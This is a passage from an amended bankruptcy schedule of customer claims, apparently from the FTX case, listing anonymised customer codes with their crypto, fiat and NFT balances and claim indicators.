| 07418400 | | BTC[0], DOGE[480.31173811], ETH[0], UNI[0], USD[0.00], USDT[2.39938860] | Yes | |
| 07418402 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07418405 | Contingent, Disputed | BTC[0.00006679], ETH[0], USD[0.00] | | |
| 07418408 | | USD[0.00] | | |
| 07418409 | | BRZ[1], CUSDT[1], SHIB[1], USD[27.11] | | |
| 07418412 | | DOGE[96.41178637], ETH[.00000061], ETHW[.00000061], LINK[.00010108], NFT [545664954969389372/Entrance Voucher #2540][1], SHIB[1], SOL[.00000081], TRX[3], USD[0.00] | Yes | |

Amended Schedule F-Nonpriority Unsecured Claims-Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07418416 | | USD[3.46], USDT[2.14689207] | | |
| 07418417 | | BTC[.00004608], USD[0.00] | Yes | |
| 07418418 | | BTC[.02089607], TRX[1], USD[0.00] | | |
| 07418421 | | LTC[.00119176], SUSHI[3.4875], USD[0.00] | | |
| 07418424 | | TRX[2], USD[0.00], USDT[0.81845809] | | |
| 07418425 | | CUSDT[9], GRT[65.04935123], TRX[456.08462849], USD[0.25] | Yes | |
| 07418427 | | NFT (313035520922111818/Warriors 75th Anniversary Icon Edition Diamond #404)[1] | | |
| 07418430 | | BTC[0], ETH[.00724712], ETHW[0.00724710], SOL[0], USDT[0] | | |
| 07418431 | | BF_POINT[300], CUSDT[2], LINK[0], SHIB[2], SOL[0], TRX[4], USD[225.49], USDT[0] | Yes | |
| 07418433 | | BTC[.09211668], ETH[1.223548], ETHW[1.223548], USD[3.51] | | |
| 07418434 | | USD[0.00] | | |
| 07418435 | | USD[0.00] | | |
| 07418438 | | DOGE[0], USD[0.12] | | |
| 07418446 | | USD[0.00] | | |
| 07418447 | | BF_POINT[100], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[45.86879111], LTC[0], MATIC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.07], USDT[42.84193591] | Yes | |
| 07418448 | | TRX[.000355], USD[0.00] | | |
| 07418449 | | DAI[.05278263], SOL[0.01000000], TRX[.000004], USD[0.82], USDT[0.08166590] | | |
| 07418450 | | BRZ[4], BTC[.00000077], CUSDT[36], ETH[.00000075], ETHW[.00000075], LINK[.0001292], TRX[10], UNI[.00018531], USD[0.01], USDT[0.00000017] | Yes | |
| 07418462 | | BTC[.00369801], ETH[.0871299], ETHW[.08610668], SHIB[3292.4552], USD[0.00] | Yes | |
| 07418464 | | BTC[.00256519], DOGE[1912.30110587], ETH[1.01558132], ETHW[1.01558132], GRT[1], LINK[13.32652462], MATIC[20], SHIB[2], TRX[2], USD[0.00] | | |
| 07418467 | | BAT[.00034213], BRZ[.76523898], CUSDT[3.0003624], DAI[5.38031315], GRT[.21434512], KSHIB[157.06050583], SUSHI[.25640731], TRX[16.70416586], USD[0.94], USDT[0.00581074] | Yes | |
| 07418468 | | TRX[.000002], USD[0.00], USDT[0.00001373] | | |
| 07418469 | Contingent, Disputed | BTC[.0000056], ETH[3.341236], ETHW[3.341236], USD[0.06] | | |
| 07418470 | | BTC[0], ETH[.00055957], ETHW[0.00055957], USD[1.65] | | |
| 07418475 | | ETH[0], USD[0.00], USDT[0.00000009] | | |
| 07418477 | | USD[0.01] | | |
| 07418481 | | USD[0.01], USDT[0] | | |
| 07418484 | | DOGE[0] | | |
| 07418486 | | BRZ[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07418495 | | DAI[.00000001], DOGE[.0884], ETHW[.011994], NFT (321031009807611160/FTX - Off The Grid Miami #1822)[1], USD[0.00] | | |
| 07418496 | | USD[0.00] | | |
| 07418500 | | USD[100.00] | | |
| 07418503 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0], ETHW[3.14150298], GRT[276.38277412], NFT (510610251862554432/Entrance Voucher #3426)[1], NFT (554121208185112463/Miami Ticket Stub #98)[1], NFT (566973780293220662/01:Predawn - Ukraine #215)[1], SHIB[1], SOL[1.59847738], TRX[2], USD[42.89] | Yes | |
| 07418507 | | CUSDT[3], SOL[.00483839], USD[5.35] | | |
| 07418508 | | BTC[0], SOL[0] | | |
| 07418517 | | USD[47.59] | | |
| 07418519 | | BTC[0.00682011], UNI[0], USD[0.00] | | |
| 07418523 | | BAT[1.0150406], BRZ[1], CUSDT[3], DOGE[19555.25513873], ETH[2.60381274], ETHW[2.60271914], TRX[2], USD[0.00] | Yes | |
| 07418524 | | BTC[.00008726], DOGE[1], USD[26.91] | | |
| 07418531 | | TRX[.000035], USD[9.68], USDT[0.00115600] | | |
| 07418534 | | CUSDT[249.75], TRX[799.2], USD[1.19] | | |
| 07418538 | | USD[1.30] | | |
| 07418539 | | DOGE[.503], SUSHI[.4895], UNI[4.7908], USD[0.04], USDT[0] | | |
| 07418554 | | NFT (316435988575246752/Entrance Voucher #2933)[1], NFT (491086114900689956/FTX - Off The Grid Miami #2773)[1] | | |
| 07418557 | | BTC[.00828671], CUSDT[1], DOGE[1329.7322689], ETH[.29193864], ETHW[.29193864], TRX[5], USD[0.00] | | |
| 07418558 | | BRZ[2], CUSDT[5], DOGE[1.00001171], SHIB[1], TRX[.00002074], USD[0.87] | | |
| 07418561 | | CUSDT[4], USD[0.01] | Yes | |
| 07418568 | | USD[0.01] | | |
| 07418575 | | BTC[0], ETH[0], ETHW[0], USD[0.90] | | |
| 07418581 | | CUSDT[1], DOGE[0], LINK[0], TRX[2], USD[0.00], USDT[0] | | |
| 07418583 | | BRZ[4], CUSDT[182.56315165], DOGE[352.18389548], KSHIB[195.53295955], SHIB[2163681.09356018], TRX[199.55551228], USD[107.87], USDT[1.09490353] | Yes | |
| 07418585 | | DOGE[1.54868792], USD[0.01] | | |
| 07418586 | | SHIB[3], USD[0.01] | Yes | |
| 07418591 | | BTC[.00090074], CUSDT[524.38160073], DOGE[107.93257825], ETH[.01097554], ETHW[.01083874], TRX[1], USD[0.00] | Yes | |
| 07418592 | | LINK[.04], SOL[0], USDT[0.00000533] | | |
| 07418597 | Contingent, Disputed | CUSDT[1], DOGE[1], TRX[349.92739642], USD[0.00] | | |
| 07418598 | | BTC[.0140436], ETH[.626484], ETHW[.626484], USD[0.87] | | |
| 07418603 | | DOGE[1], GRT[1], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07418605 | | BTC[0], LINK[1], TRX[1], USD[0.00] | | |
| 07418615 | | BTC[.00009691], USD[0.00] | | |
| 07418623 | | CUSDT[2], DOGE[4148.71439437], GRT[1], TRX[3], USD[0.24], USDT[1] | | |
| 07418625 | | BAT[3], BRZ[3], CUSDT[4], DOGE[1], GRT[2], TRX[5], USD[0.00] | | |
| 07418626 | | USD[20.66] | | |
| 07418630 | | DOGE[0], USD[0.05] | | |
| 07418639 | | CUSDT[1], KSHIB[29.93639563], TRX[0], USD[0.00] | Yes | |
| 07418640 | | BAT[1], CUSDT[4], DOGE[13545.36343584], TRX[2], USD[0.00], USDT[2] | | |
| 07418642 | | DOGE[1], TRX[1.000007], USDT[0] | | |
| 07418643 | | SOL[0], USD[0.09] | | |
| 07418649 | | BTC[0.00002005], ETH[.17336988], ETHW[.17336988], LINK[224.6272], MATIC[8.38117714], SOL[.0024], SUSHI[.298], USD[21.14] | | |
| 07418657 | | USD[0.00], USDT[0] | | |
| 07418660 | | CUSDT[4], DOGE[0], TRX[0], USD[0.01], YFI[0] | Yes | |
| 07418662 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07418665 | | CUSDT[942.11922414], DOGE[0], USD[0.00] | | |
| 07418672 | | BRZ[1], CUSDT[1], DOGE[0.08599147], LTC[.000006], SOL[.00085342], SUSHI[.00015127], TRX[2], USD[0.89] | | |
| 07418677 | | USD[0.00] | | |
| 07418683 | | UNI[5.77128023], USD[0.00] | | |
| 07418686 | | SHIB[1593666.63679074], USD[0.00] | Yes | |
| 07418689 | | DOGE[2], TRX[2], USD[51.02] | | |
| 07418691 | | BTC[.00014056], USD[0.00] | | |
| 07418701 | | USD[10.00] | | |
| 07418702 | | BRZ[1], DOGE[29577508], ETHW[.00009732], GRT[404.06074829], NEAR[.00661226], SHIB[51106.59760795], UNI[.075], USD[0.02], USDT[1.00105624] | Yes | |
| 07418703 | | USD[0.75], USDT[0] | | |
| 07418706 | | DOGE[2010.85259041], TRX[.000001], USD[0.34], USDT[0] | | |
| 07418707 | | DOGE[176.2439943], USD[0.27] | Yes | |
| 07418713 | | AAVE[0], ALGO[0], AVAX[0], BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], MATIC[0], NEAR[0], SHIB[48628291.02055152], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[55.00], USDT[0] | Yes | |
| 07418714 | | AAVE[0], BCH[1.71266727], CUSDT[.50032981], DOGE[0], ETHW[12.9502039], PAXG[0], SHIB[3086201.33611372], SOL[56.34763252], USD[0.05], USDT[0] | Yes | |
| 07418715 | Contingent, Disputed | USD[0.00] | | |
| 07418716 | Contingent, Unliquidated | AAVE[2.00049328], BAT[1.0165555], SHIB[725085.44225467], UNI[8.00197283], USD[0.99], USDT[0.00000001] | Yes | |
| 07418719 | | BTC[0], CUSDT[2], DOGE[1120.60598522], USD[0.00] | Yes | |
| 07418730 | | BTC[0], SHIB[2381.60748891], USD[0.00], USDT[0.00000001] | | |
| 07418731 | | BAT[1.0165555], BRZ[2], CUSDT[28], DOGE[.57540753], GRT[1.00498957], SUSHI[2.94540228], TRX[.61337173], USD[0.08] | Yes | |
| 07418734 | | SOL[0] | | |
| 07418735 | | BTC[0], CUSDT[4], DOGE[1244.00146476], ETH[0.07861473], ETHW[0.07861473], TRX[2], USD[0.00] | | |
| 07418742 | | DOGE[1], ETH[.0002072], ETHW[.0002072], USD[0.69] | | |
| 07418745 | | BTC[0], GRT[0], USD[0.00] | | |
| 07418747 | | BRZ[3], CUSDT[18], DOGE[0], ETH[0], LINK[0], TRX[3], USD[0.00] | Yes | |
| 07418754 | | USD[4.74] | | |
| 07418758 | | CUSDT[2], DOGE[1189.95686825], SOL[2.43137852], SUSHI[2.13333915], TRX[1], USD[0.00] | | |
| 07418759 | | AAVE[0], BAT[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], NFT [56171578435194710/Light House #2 ][1], SOL[0.00000001], SUSHI[0], TRX[0], USD[3.05] | Yes | |
| 07418763 | | DOGE[22.9775885], USD[0.00] | | |
| 07418764 | | BRZ[3], CUSDT[2], GRT[1], SHIB[4], TRX[1], USD[0.02] | | |
| 07418766 | | USD[43.63] | Yes | |
| 07418767 | Contingent, Disputed | DOGE[1], USD[0.00] | | |
| 07418768 | | BAT[0], BCH[0], CUSDT[0], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07418772 | | BRZ[2], DOGE[4], ETHW[.07757404], SHIB[65], TRX[12], USD[0.76] | Yes | |
| 07418773 | | DOGE[0], USD[0.00] | | |
| 07418780 | Contingent, Disputed | USD[3.21] | | |
| 07418785 | | AUD[0.00], BRZ[10.72092955], CUSDT[36], LTC[.15558732], SHIB[.00000019], SUSHI[2.90363274], UNI[5.28475409], USD[0.00] | Yes | |
| 07418787 | | SUSHI[.487], USD[212.35] | | |
| 07418790 | | CUSDT[1], USD[0.01] | | |
| 07418791 | | BTC[0], DOGE[3], ETH[.04165756], ETHW[.04165756], GRT[.00000768], USD[0.00] | | |
| 07418794 | | BRZ[1], DOGE[3151.35568095], USD[0.00] | | |
| 07418797 | | BTC[.00001281], CUSDT[3], TRX[3], USD[0.02] | | |
| 07418802 | | BRZ[1], USD[0.00] | | |
| 07418809 | | DOGE[.0006145], USD[0.00], USDT[0.00000001] | Yes | |
| 07418816 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07418820 | | BAT[.00673019], CUSDT[3], DOGE[1], TRX[4], USD[0.01], USDT[0] | Yes | |
| 07418824 | | BAT[0], DOGE[0], ETH[0], ETHW[0], LTC[0], USD[0.00] | | |
| 07418830 | | NFT (327635846430234973/Entrance Voucher #1889)[1], SOL[.00000004], USD[1.52] | | |
| 07418831 | | CUSDT[3], DOGE[702.29945457], LTC[.01956741], USD[0.00] | | |
| 07418832 | | CUSDT[472.11422321], DAI[9.91632446], DOGE[21.21950954], GRT[126.98916129], PAXG[.02860851], SUSHI[4.84241737], TRX[74.49681916], USD[0.00], USDT[99.46061414] | | |
| 07418840 | | USD[0.00] | | |
| 07418844 | | USD[4.40] | | |
| 07418846 | | CUSDT[513.22977988], DOGE[135.35133174], ETH[.00617176], ETHW[.00608968], USD[21.98] | Yes | |
| 07418859 | | BRZ[2], CUSDT[3], DOGE[1837.31810261], GRT[1], TRX[3], USD[0.00] | Yes | |
| 07418866 | | USD[0.01] | | |
| 07418869 | | BAT[0], CUSDT[2], DOGE[1], GRT[0], LTC[0], TRX[2], USD[0.01] | Yes | |
| 07418872 | | NFT (313877266555990092/Humpty Dumpty #656)[1] | | |
| 07418878 | | BRZ[3], BTC[0], CUSDT[6], DOGE[0], GRT[1], TRX[1], USD[0.00] | | |
| 07418885 | | BAT[1], BRZ[3], BTC[.00000001], CUSDT[13], DOGE[5], GRT[1], SHIB[8], TRX[0], USD[0.01] | Yes | |
| 07418886 | | BAT[0], BRZ[2], BTC[0], CUSDT[3], DAI[0], DOGE[0], ETH[0], LTC[0], PAXG[0], TRX[0], USD[0.00], YFI[0] | | |
| 07418887 | | BAT[1], BTC[0], ETH[.00014784], ETHW[.00014784], TRX[1], USD[0.00] | | |
| 07418889 | | BRZ[2], CUSDT[7], DOGE[2440.34581321], EUR[4.60], GRT[1.00498957], TRX[115.58097358], USD[0.01], USDT[1.10133172] | Yes | |
| 07418892 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07418893 | | NFT (290723996645949121/Popsicles #6)[1], NFT (444880788827394012/Entrance Voucher #3532)[1], USD[0.32] | | |
| 07418896 | | SUSHI[600.466], USD[0.34] | | |
| 07418897 | | USD[0.00] | | |
| 07418908 | | CUSDT[3], DOGE[11073.26956290], USD[1000.00] | | |
| 07418916 | | BRZ[1], CUSDT[3], DOGE[1893.39367128], SHIB[2], TRX[2023.38310541], USD[0.00] | Yes | |
| 07418919 | | BTC[.00963916] | | |
| 07418920 | | USD[0.00] | | |
| 07418921 | | ALGO[.0032221], BTC[.00000014], ETH[.00000012], ETHW[.00000012], LINK[.00027478], SHIB[.00000076], USD[2059.59], USDT[1.00057551] | Yes | |
| 07418922 | | BTC[.02490973] | | |
| 07418924 | | DOGE[1], SHIB[330675.05899209], SOL[1.45068265], USD[0.01] | | |
| 07418925 | | USD[2.38] | | |
| 07418931 | | BRZ[2], DOGE[4332.39255680], ETH[0.12200640], ETHW[0.12200640], TRX[2], USD[0.00] | | |
| 07418932 | | BRZ[1], CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07418937 | | CUSDT[1], USD[0.00] | | |
| 07418942 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07418945 | | ETH[0], ETHW[0], TRX[1] | | |
| 07418949 | | ETH[.0007], ETHW[.0007], SOL[21.25036], USD[0.85] | | |
| 07418958 | | CUSDT[5], USD[0.00] | | |
| 07418962 | | DOGE[2], LINK[1.02270102], USD[0.00] | | |
| 07418973 | | USD[0.02] | | |
| 07418976 | | DOGE[.576], ETHW[.253], USD[0.74], USDT[1.05254298] | | |
| 07418978 | | BAT[1], CUSDT[1], DOGE[11050.40645128], USD[0.00] | | |
| 07418979 | | BRZ[2.00007211], BTC[.02382545], CUSDT[41.00000669], DOGE[3414.28041125], ETH[.2743701], ETHW[.27417732], GRT[.00006529], LTC[1.72048055], SHIB[3], SOL[.27139148], TRX[6], USD[105.87] | Yes | |
| 07418984 | | BTC[0], DOGE[0], GRT[1.00498957], SOL[0], TRX[1], UNI[0], USD[0.01], USDT[.00000001] | Yes | |
| 07418987 | | USD[0.00] | | |
| 07418989 | | BTC[.0007211], DOGE[812.93420646], USD[0.00] | | |
| 07418992 | | SOL[0], USD[4.47] | | |
| 07418993 | | BTC[.00038604], DOGE[1], ETH[.00447526], ETHW[.00447526], USD[0.46] | | |
| 07418998 | | DOGE[1], TRX[0] | | |
| 07419000 | | USD[0.00] | | |
| 07419003 | | BTC[.00011092], SUSHI[.1294], USD[0.00] | | |
| 07419006 | | BTC[.00000033], USD[0.71] | | |
| 07419007 | | USD[0.25] | | |
| 07419010 | | ALGO[36.23854144], BAT[78.35644292], BRZ[117.1409877], CUSDT[944.56174797], DOGE[12836.28040947], GRT[28.62381292], LINK[2.32867402], LTC[.18773196], MATIC[22.54839528], SHIB[1136885.4001819], TRX[1384.08929812], USD[100.00], USDT[24.86266831] | | |
| 07419012 | | CUSDT[4], DOGE[.00003184], ETH[0], SUSHI[1.0367882], TRX[0], USD[0.07] | | |
| 07419014 | | USD[6.95] | | |
| 07419017 | | TRX[1], USD[0.00] | Yes | |
| 07419021 | | CUSDT[33], DOGE[0], GRT[0], SHIB[2], SOL[0], USD[0.27], USDT[0.00000016] | Yes | |
| 07419024 | | BTC[.00016501], USD[0.00] | | |
| 07419028 | | ETH[.00000002], ETHW[0], USD[0.01], USDT[.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419030 | | CUSDT[1], NFT (377589116303044517/Joker)[1], NFT (469837526358570379/Nirvana Set #1)[1], NFT (575699499855702030/Pixel Banana #1 - Power Up)[1], SOL[.05775539], USD[0.00] | Yes | |
| 07419033 | | CUSDT[13], DOGE[1983.60748654], ETH[.0713053], ETHW[.07041936], GRT[1.00323811], MATIC[47.68719822], SHIB[17004103.34516882], TRX[3322.05983444], USD[107.55] | Yes | |
| 07419037 | | USD[5.40] | | |
| 07419045 | | BCH[0], BTC[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07419056 | | CUSDT[1], DOGE[5659.34842301], ETH[.02000313], ETHW[.01975671], USD[522.45] | | |
| 07419061 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07419062 | | USD[3.84] | | |
| 07419064 | | CUSDT[1], USD[0.00] | Yes | |
| 07419065 | | USD[3.92] | | |
| 07419073 | | BTC[0], DOGE[1], SHIB[0], SOL[0], SUSHI[3.54088067], TRX[0], USD[0.00] | Yes | |
| 07419077 | | CUSDT[3.00003334], SHIB[1], TRX[.00019547], USD[0.01] | Yes | |
| 07419082 | | BAT[1], USD[0.01] | | |
| 07419087 | | BTC[0], ETH[.00000001], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07419090 | | USD[5.59] | | |
| 07419092 | | TRX[68.68130417], USD[0.00] | | |
| 07419096 | | ETH[.004], ETHW[.004], USD[0.00] | | |
| 07419097 | | DOGE[18.51699999], NFT (288784716707167615/Alone + Together)[1], NFT (289169071243246072/Alone + Together)[1], NFT (289259889266159576/Alone + Together)[1], NFT (289494724399726151/Alone + Together)[1], NFT (289772650602058074/Alone + Together)[1], NFT (289805582514839606/Alone + Together)[1], NFT (290072937388210606/Alone + Together)[1], NFT (290959256214491035/Alone + Together)[1], NFT (291323242358668216/Alone + Together)[1], NFT (291621925630639838/Alone + Together)[1], NFT (291853298371843848/Alone + Together)[1], NFT (291882558124748919/Alone + Together)[1], NFT (291940796080100900/Alone + Together)[1], NFT (292028148671508648/Alone + Together)[1], NFT (292172458313564040/Alone + Together)[1], NFT (292388696009361588/Alone + Together)[1], NFT (292655384962190044/Alone + Together)[1], NFT (292755399975797189/Alone + Together)[1], NFT (293256024752792112/Alone + Together)[1], NFT (293410576805545424/Alone + Together)[1], NFT (293641894542831849/Alone + Together)[1], NFT (293900431596514457/Alone + Together)[1], NFT (294100759920832/Alone + Together)[1], NFT (294106569564992952/Alone + Together)[1], NFT (294145070012715075/Alone + Together)[1], NFT (294168440767180612/Alone + Together)[1], NFT (294776292058746077/Alone + Together)[1], NFT (294857426860726047/Alone + Together)[1], NFT (295457568577485152/Alone + Together)[1], NFT (295495392060283348/Alone + Together)[1], NFT (295855812894454370/Alone + Together)[1], NFT (295707733596633659/Alone + Together)[1], NFT (295782039799243743/Alone + Together)[1], NFT (295990685106781949/Alone + Together)[1], NFT (296084741730588017/Alone + Together)[1], NFT (296272709428892830/Alone + Together)[1], NFT (296914545786319364/Alone + Together)[1], NFT (297000045255711332/Alone + Together)[1], NFT (297267907521313056/Alone + Together)[1], NFT (298117880643949096/Alone + Together)[1], NFT (298356179089480004/Alone + Together)[1], NFT (298450124330423659/Alone + Together)[1], NFT (298789324315690778/Alone + Together)[1], NFT (299044149800952488/Alone + Together)[1], NFT (299618026150528396/Alone + Together)[1], NFT (299629866712026804/Alone + Together)[1], NFT (299609362672942510/6/Alone + Together)[1], NFT (299886975526242208/Alone + Together)[1], NFT (300019641843705190/Alone + Together)[1], NFT (300337702785355525/Alone + Together)[1], NFT (300959717860906075/Alone + Together)[1], NFT (302136951478936[1]/Alone + Together)[1], NFT (302958558455594150/Alone + Together)[1], NFT (302669385035007503/Alone + Together)[1], NFT (302666835025507053/Alone + Together)[1], NFT (303073418760204039/Alone + Together)[1], NFT (303213534599761899/Alone + Together)[1], NFT (303422116187670741/Alone + Together)[1], NFT (303533376586342/8/Alone + Together)[1], NFT (303797761910519562/Alone + Together)[1], NFT (303931198354537764/Alone + Together)[1], NFT (304370892704653822/Alone + Together)[1], NFT (305104979521741415/Alone + Together)[1], NFT (305108281706308029/Alone + Together)[1], NFT (305155928701185754/Alone + Together)[1], NFT (305661667659536598/Alone + Together)[1], NFT (305922442134504101/Alone + Together)[1], NFT (306528672944118436/Alone + Together)[1], NFT (306718240865740[97]/Alone + Together)[1], NFT (306811103727005512/Alone + Together)[1], NFT (307183690075543259/Alone + Together)[1], NFT (307280326499448935/Alone + Together)[1], NFT (308549842033839864/Alone + Together)[1], NFT (308833711755482162/Alone + Together)[1], NFT (308891092231166628/Alone + Together)[1], NFT (309114049942599666/Alone + Together)[1], NFT (310240394191242170/Alone + Together)[1], NFT (310310081589640017/Alone + Together)[1], NFT (310555722244690430/Alone + Together)[1], NFT (310719353874705298/Alone + Together)[1], NFT (310855559887710393/Alone + Together)[1], NFT (310929973286676530/Alone + Together)[1], NFT (311371109635112594/Alone + Together)[1], NFT (311855209760729511/Alone + Together)[1], NFT (312160936899514077/Alone + Together)[1], NFT (312248006080058441/Alone + Together)[1], NFT (312789112305545879/Alone + Together)[1], NFT (312856736049653652/Alone + Together)[1], NFT (312812612886569114/Alone + Together)[1], NFT (313303519965232484/Alone + Together)[1], NFT (313372805186356740/Alone + Together)[1], NFT (313871056800717453/Alone + Together)[1], NFT (314076031857214076/Alone + Together)[1], NFT (314746072855267677/Alone + Together)[1], NFT (314811576441670597/Alone + Together)[1], NFT (315073071676173338/Alone + Together)[1], NFT (315197317527011575/Alone + Together)[1], NFT (315242236305712375/Alone + Together)[1], NFT (315472293452697/Alone + Together)[1], NFT (315737057908817868/Alone + Together)[1], NFT (315792351102318977/Alone + Together)[1], NFT (315896206512067622/Alone + Together)[1], NFT (316143853596195004/Alone + Together)[1], NFT (316680945690340483/Alone + Together)[1], NFT (316831110206934014634/Alone + Together)[1], NFT (316843158140050947/Alone + Together)[1], NFT (317353813882213955/Alone + Together)[1], NFT (317431994241574958/Alone + Together)[1], NFT (317861740013897638/Alone + Together)[1], NFT (317947114200249650/Alone + Together)[1], NFT (318182146866534536/Alone + Together)[1], NFT (318690093110615259/Alone + Together)[1], NFT (318734094847219057/Alone + Together)[1], NFT (319042225081507276/Alone + Together)[1], NFT (319066882819411260/Alone + Together)[1], NFT (319106218867961568/Alone + Together)[1], NFT (319155795095598632/Alone + Together)[1], NFT (319158789911412762/Alone + Together)[1], NFT (319649681109140321/Alone + Together)[1], NFT (321559503230982915/Alone + Together)[1], NFT (321581840477703945/Alone + Together)[1], NFT (323101811470060365/Alone + Together)[1], NFT (323859764480027953/Alone + Together)[1], NFT (324426741705806967/Alone + Together)[1], NFT (324935239444765059/Alone + Together)[1], NFT (324977920482132984/Alone + Together)[1], NFT (325004074521785736/Alone + Together)[1], NFT (325238261675867117/Alone + Together)[1], NFT (325819722199561937/Alone + Together)[1], NFT (325856429295504051/Alone + Together)[1], NFT (325966084643238446/Alone + Together)[1], NFT (326399573977006552/Alone + Together)[1], NFT (326796605045997532/Alone + Together)[1], NFT (327038619750723738/Alone + Together)[1], NFT (327026866914577865/Alone + Together)[1], NFT (327086433520716662/Alone + Together)[1], NFT (327505191807343387/Alone + Together)[1], NFT (328169320359797573/Alone + Together)[1], NFT (328247774752038057/Alone + Together)[1], NFT (328283111603869501/Alone + Together)[1], NFT (328550476829880098/Alone + Together)[1], NFT (328756812289913530/Alone + Together)[1], NFT (328847375511802740/Alone + Together)[1], NFT (329267661996258136/Alone + Together)[1], NFT (329347521841006108/Alone + Together)[1], NFT (329528034731087556/Alone + Together)[1], NFT (330556248793611827/Alone + Together)[1], NFT (330610120994202082/Alone + Together)[1], NFT (330847437535748536/Alone + Together)[1], NFT (330853994529199701/Alone + Together)[1], NFT (330959694983959816/Alone + Together)[1], NFT (331258855340611878/Alone + Together)[1], NFT (331505914344456663/Alone + Together)[1], NFT (332021844332909966/Alone + Together)[1], NFT (332390609004388043/Alone + Together)[1], NFT (332488585119474380/Alone + Together)[1], NFT (332637284243317925/Alone + Together)[1], NFT (332910890701948509/Alone + Together)[1], NFT (333320870085444230/Alone + Together)[1], NFT (333849678589067946/Alone + Together)[1], NFT (333681436365862759/Alone + Together)[1], NFT (334496052361699603/Alone + Together)[1], NFT (334542189733375781/Alone + Together)[1], NFT (334884267637084814/Alone + Together)[1], NFT (334888296746547750/Alone + Together)[1], NFT (334891051745330539/Alone + Together)[1], NFT (335053288323865360/Alone + Together)[1], NFT (335464138842218529/Alone + Together)[1], NFT (336559476353852526/Alone + Together)[1], NFT (336628776913449905/Alone + Together)[1], NFT (337029549108471941/Alone + Together)[1], NFT (337046886553809087/34/Alone + Together)[1], NFT (337135981906314174/Alone + Together)[1], NFT (338157119632669847/Alone + Together)[1], NFT (338864759429851040/Alone + Together)[1], NFT (338974947634657701/Alone + Together)[1], NFT (339027635383245885/Alone + Together)[1], NFT (339043754611791720/Alone + Together)[1], NFT (339201862901086674/Alone + Together)[1], NFT (339332228880896652/Alone + Together)[1], NFT (340038807937336465/Alone + Together)[1], NFT (340040187360455128/Alone + Together)[1], NFT (340088225393939306/0/Alone + Together)[1], NFT (340146879106826529/Alone + Together)[1], NFT (340518144717747263/Alone + Together)[1], NFT (340641957446837608/Alone + Together)[1], NFT (340864516391153685/Alone + Together)[1], NFT (341540494067796105/Alone + Together)[1], NFT (341683470503827538/Alone + Together)[1], NFT (341799757599647922/Alone + Together)[1], NFT (341949567196623804/Alone + Together)[1], NFT (342169116651739981/Alone + Together)[1], NFT (342269508109563515/Alone + Together)[1], NFT (342615824322437603/Alone + Together)[1], NFT (342699961203281468/Alone + Together)[1], NFT (343061973014060047/Alone + Together)[1], NFT (344800000013770047/Alone + Together)[1]... | | |
| 07419099 | | ETH[.00003018], ETHW[.00003018], USD[0.00] | | |
| 07419105 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], LTC[0] | | |
| 07419106 | | USD[9.62], USDT[.003144] | | |
| 07419107 | | BTC[0.00071916], ETH[.01494], SOL[.30216819], UNI[1.02717509], USD[0.01], USDT[0.00000001] | | |
| 07419109 | | USD[2.75] | | |
| 07419113 | | LTC[.00616505], TRX[.000007], USDT[2.92678238] | | |
| 07419114 | | BRZ[1], CUSDT[5], DOGE[2138.57541942], SHIB[5130864.14203825], SUSHI[36.88360369], TRX[133.20345925], USD[172.39] | Yes | |
| 07419115 | | BRZ[1], CUSDT[5], USD[0.01] | | |
| 07419116 | | BRZ[3], CUSDT[12], TRX[4], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419118 | | USD[4.33] | | |
| 07419119 | | ETH[2.78588319], ETHW[2.78588319], SOL[423.70941856], USD[0.00] | | |
| 07419122 | | BAT[.6], BTC[.0000269], DOGE[.64], ETH[.000445], ETHW[.22923], LINK[.0198], MATIC[9.26], SOL[.00369], SUSHI[.46], TRX[.272], USD[2647.45] | | |
| 07419134 | | BRZ[1], CUSDT[11], GRT[1], TRX[3], USD[0.00] | | |
| 07419136 | | DOGE[0], USD[0.00] | | |
| 07419139 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07419140 | | BRZ[1], BTC[.00899885], USD[0.00] | | |
| 07419142 | | BAT[1], BRZ[1], CUSDT[8], DOGE[1242.83094879], TRX[5], USD[0.00], USDT[3] | | |
| 07419144 | | DOGE[1300.52043372], TRX[1], USD[0.00] | | |
| 07419145 | | DOGE[1], USD[0.01] | Yes | |
| 07419149 | | BRZ[1], CUSDT[3], DOGE[1655.34706897], TRX[1], USD[135.65] | Yes | |
| 07419151 | | CUSDT[2], DOGE[109.26692551], ETH[.00490988], ETHW[.00485516], LTC[.04657772], TRX[1], USD[16.56] | Yes | |
